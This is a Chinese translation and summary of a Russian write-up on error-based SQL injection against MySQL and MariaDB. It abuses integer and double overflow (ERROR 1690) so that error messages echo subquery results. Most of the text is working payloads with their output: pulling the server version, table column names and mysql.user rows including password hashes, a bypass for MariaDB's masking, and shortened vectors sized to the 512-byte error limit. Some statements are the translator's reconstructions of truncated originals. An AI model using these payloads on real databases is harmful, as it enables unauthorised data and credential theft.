原文是俄文,不便逐句翻译,这里附上大意(SQL 语句和报错信息保持原样,只修正了转载时被打乱的格式):
这种报错注入基于 mysql 的整数溢出检查:算术结果超出 BIGINT(或 DOUBLE)范围时,mysql 会抛出 ERROR 1690 (SQLSTATE 22003),并把出错的表达式原样写进错误信息。只要让出错表达式里带上子查询,子查询的求值结果就会随错误信息回显出来。
先看触发这个错误的最简形式:

mysql> select 18446744073709551610 * 2;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'

mysql> select -1 * 9223372036854775808;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

关键在于错误信息会把出错表达式打印出来,而表达式里的子查询在这一步已经被求值成了常量。把子查询放进 if() 的条件位置,并让两个分支都是同一个必定溢出的值,这样无论条件真假都会报错,子查询结果就随错误信息一起回显:

mysql> select 2 * (if((select * from (select (version())) s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'

如果把两个行子查询拿来比较,错误信息会把展开后的列名一并打印出来:

mysql> select 2 * if((select * from (select * from test.shop) as `` limit 1) > (select * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` as `article`,`test`.`shop`.`dealer` as `dealer`,`test`.`shop`.`price` as `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
-- 由此得到表 test.shop 的列名(原文注释:узнаем имена колонок в таблице)

同样的写法用在 mysql.user 上,回显的就是第一行记录的各列值。原文此处的语句被截断,按上一条的写法补全应为(错误信息中的口令散列已被原作者用 * 代替,后半段省略):

mysql> select 2 * if((select * from (select * from mysql.user limit 1) as `` limit 1) > (select * from mysql.user limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y',...,'','','','','0','0','0','0','','' from dual limit 1) ...'

需要注意的是,该方法并不适用于老版本的 mysql(老版本遇到这类溢出通常只产生 warning 或静默截断,不会抛出 1690 错误,具体版本界限以目标实测为准)。除此之外,你还需要了解错误信息的长度限制,因为它决定了一次能带出多长的数据:
mysys/my_error.c:

/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)

也就是说整条错误信息——包括固定的 "BIGINT UNSIGNED value is out of range in '...'" 前后缀和被打印出来的整段表达式——最多 512 字节,超出部分会被截断。注入的表达式本身也占用这 512 字节,所以 vector 越短,一次能回显的数据就越多,这也是后面要压缩 vector 的原因。如果目标是 MariaDB(mysql 的一个分支),当你尝试上面的方法时,可能会看到这样的报错信息:
mysql> select 2*(if((select * from (select (version()))s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

可以看到 MariaDB 在打印出错表达式时把子查询整体替换成了 #,子查询结果不再回显。作为解决方案,可以改成下面这种写法:
mysql> select (i is not null) - -9223372036854775808 from (select (version())i)a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-mariadb' is not null) - -(9223372036854775808))'

这里不再把子查询直接放进出错表达式,而是用派生表 a 把 version() 的结果绑定到列 i,表达式只引用 i;打印表达式时 i 已经被替换成它的常量值 '5.5-mariadb',从而绕过了 MariaDB 对子查询的 # 替换。(i is not null) 的结果是 0 或 1,减去 -9223372036854775808 后都超出有符号 BIGINT 的范围,所以同样会触发 1690。现在让我们看看能不能让 vector 更短一些:
-- 下面每组中,第一行是前文的原始写法,"=" 后面是等价的精简写法。
-- 1) 查询数据库版本
select 2*(if((select * from (select (version()))s), 18446744073709551610, 18446744073709551610))
= select 1e308*if((select*from(select version())x),2,2)

-- 2) MariaDB 下的版本查询
select (i is not null) - -9223372036854775808 from (select (version())i)a
= select if(x,2,2)*1e308 from(select version()x)y

-- 3) 比较两个行子查询,回显列名和整行数据(精简写法以 mysql.user 为例)
select 2 * if((select * from (select * from test.shop) as `` limit 1)>(select * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
= select 1e308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

-- 4) 只取 mysql.user 的第一行(原文这一组的两条语句都被截断,下面按第 3 组的形式补全)
select 2 * if((select * from (select * from mysql.user limit 1) as `` limit 1)>(select * from mysql.user limit 1), 18446744073709551610, 18446744073709551610)
= select 1e308*if((select*from(select*from mysql.user limit 1)``limit 1)>(select*from mysql.user limit 1),2,2)

-- 5) 只带出关心的几列
select 1e308*if((select user||host||password||file_priv from(select*from mysql.user limit 1)a limit 1),2,2)

精简的要点:1e308*2 已经超出 DOUBLE 的范围,同样触发 1690(报错文本变为 "DOUBLE value is out of range"),但常量比 18446744073709551610 短得多;if() 的两个分支只要相同即可,写成 2 就够;派生表别名用空反引号 `` 或单个字母。另外两点实测时要留意:第 5 组里的 || 在默认 sql_mode 下是逻辑或而不是字符串拼接(只有开启 PIPES_AS_CONCAT 才是拼接),不过这里并不依赖它的求值结果——从前面 MariaDB 例子的回显可以看到,打印出错表达式时列引用已被替换成常量值,所以各列的值(包括口令散列)照样会出现在错误信息里;新版本 MySQL(5.7 起)的 mysql.user 已经没有 password 列,改为 authentication_string,需要相应调整列名。
